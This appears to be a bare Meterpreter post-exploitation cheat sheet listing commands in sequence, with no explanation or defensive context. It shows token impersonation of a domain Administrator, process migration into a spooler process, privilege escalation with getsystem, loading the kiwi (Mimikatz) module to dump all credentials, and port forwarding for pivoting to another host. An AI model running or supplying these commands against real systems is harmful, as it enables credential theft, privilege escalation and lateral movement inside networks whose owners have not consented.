mtr> load incognito
mtr> list_tokens -u
mtr> impersonate_token APT\\Administrator
mtr> drop_token
mtr> ps
mtr> migrate <spoolId>
mtr> getuid
mtr> getsystem
mtr> load kiwi
mtr> creds_all
mtr> portfwd add –l <listenPort> –p <remotePort> –r <rhost>